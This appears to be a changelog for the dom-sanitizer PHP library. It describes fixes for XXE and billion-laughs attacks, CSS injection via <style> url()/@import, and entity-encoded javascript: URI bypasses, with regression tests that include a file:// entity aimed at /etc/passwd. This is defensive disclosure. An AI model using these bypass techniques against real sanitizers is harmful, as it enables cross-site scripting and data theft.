Security

• Harden loadDocument against XXE and entity-expansion attacks

• Strip and declarations from sanitizer input before parsing, then call loadXML/loadHTML with LIBXML_NONET so the parser cannot make outbound filesystem or network requests for external entities/DTDs. Also calls libxml_disable_entity_loader on PHP < 8 (no-op on PHP 8+, where the default already declines external entities).

• Closes the dom-sanitizer half of GHSA-3446-6mgw-f79p (filed against Grav, which uses this library as its SVG sanitizer). The companion fix in Grav core is in VectorImageMedium's dimension reader.

• Two new XXE regression tests added to DomSanitizerTest:

  • file:// SYSTEM entity payload — must not expand into /etc/passwd
  • billion-laughs DOCTYPE — must not balloon memory

Security

• Fixed CSS injection via SVG/HTML <style> text content (GHSA-93vf-569f-22cq) — DOMSanitizer::sanitize() allowed <style> elements in both SVG and HTML mode but never inspected their text content, letting CSS url() references and [@import](https://github.com/import) rules pass through unfiltered. An attacker could exfiltrate the page URL to an external host, load arbitrary stylesheets, or use CSS attribute-selector tricks to leak form token values. The fix walks <style> text nodes and drops the element if it contains [@import](https://github.com/import), url(...) with an external scheme (http:, https:, ftp:, //, data:), or legacy expression(). CSS hex escapes like \75 rl(...) are decoded before matching so escape-based bypasses are caught. Fragment references such as url(#gradientId) are preserved so SVG <defs>, gradients, filters, and masks continue to work normally.

Security & Bug Fixes

Security

• Fixed SVG sanitizer bypass via ASCII whitespace entities (https://github.com/rhukster/dom-sanitizer/issues/6) — Addresses a bypass of the CVE-2026-33172 fix where character entities like (tab), (newline), and (CR) could be used to smuggle javascript: URIs past the regex-based sanitization. The fix adds DOM-level URL scheme validation that operates on decoded attribute values, eliminating this entire class of entity-encoding bypasses.
• Added comprehensive XSS event handler tests for GHSA-gxwg-x2jg-q44j to improve test coverage of onload, onclick, onerror, onmouseover, and other event handler stripping across SVG and HTML contexts.
• Added SECURITY.md with instructions for private vulnerability reporting.

Bug Fixes

• Fixed SVG filter elements being incorrectly removed (https://github.com/rhukster/dom-sanitizer/issues/5) — SVG filter tags (feGaussianBlur, feBlend, feColorMatrix, etc.) were defined in camelCase but compared against lowercased tag names, causing all filter elements to be silently stripped during sanitization.